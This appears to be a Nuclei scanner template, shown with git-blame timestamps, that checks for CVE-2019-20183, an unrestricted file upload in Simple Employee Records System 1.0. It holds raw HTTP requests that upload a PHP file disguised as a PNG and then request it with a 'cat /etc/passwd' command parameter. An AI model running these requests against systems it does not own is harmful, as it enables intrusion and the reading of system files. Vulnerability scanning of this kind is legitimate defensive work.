2021-09-30 16:52:05 +00:00
id : CVE-2019-20183
2021-03-01 11:40:03 +00:00
info :
2022-06-10 15:47:17 +00:00
name : Simple Employee Records System 1.0 - Unrestricted File Upload
2023-06-15 11:20:01 +00:00
author : pikpikcu,j4vaovo
2021-09-30 16:52:05 +00:00
severity : high
2022-06-20 16:38:15 +00:00
description : |
Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/49596
2022-05-17 09:18:12 +00:00
- https://medium.com/@Pablo0xSantiago/cve-2019-20183-employee-records-system-bypass-file-upload-to-rce-ea2653660b34
2022-06-10 15:47:17 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-20183
2021-09-30 16:52:05 +00:00
classification :
2021-09-30 16:53:23 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
2021-09-30 16:52:05 +00:00
cvss-score : 7.2
cve-id : CVE-2019-20183
2022-04-22 10:38:41 +00:00
cwe-id : CWE-434
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:employee_records_system_project:employee_records_system:*:*:*:*:*:*:*:*
epss-score : 0.02791
2022-09-01 10:54:47 +00:00
tags : edb,cve,cve2019,rce,intrusive,fileupload
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2021-03-01 11:40:03 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-01 11:40:03 +00:00
- raw :
- |
POST /dashboard/uploadID.php HTTP/1.1
Host : {{Hostname}}
Accept : application/json, text/javascript, */*; q=0.01
2021-09-09 06:36:24 +00:00
X-Requested-With : XMLHttpRequest
2021-03-01 11:40:03 +00:00
Content-Type : multipart/form-data; boundary=---------------------------5825462663702204104870787337
-----------------------------5825462663702204104870787337
Content-Disposition : form-data; name="employee_ID"; filename="poc.php"
Content-Type : image/png
<?php
2023-06-15 11:20:01 +00:00
print('CVE-2019-20183');
unlink(__FILE__);
2021-03-01 11:40:03 +00:00
? >
-----------------------------5825462663702204104870787337 --
2021-09-08 12:17:19 +00:00
2021-03-01 11:40:03 +00:00
- |
GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1
Host : {{Hostname}}
extractors :
- type : regex
name : endpoint
part : body
internal : true
regex :
- '(?:[a-zA-Z0-9+\/])*_poc.php'
matchers :
2023-06-15 11:20:01 +00:00
- type : word
2022-06-20 16:38:15 +00:00
part : body
2023-06-15 11:20:01 +00:00
words :
- "CVE-2019-20183"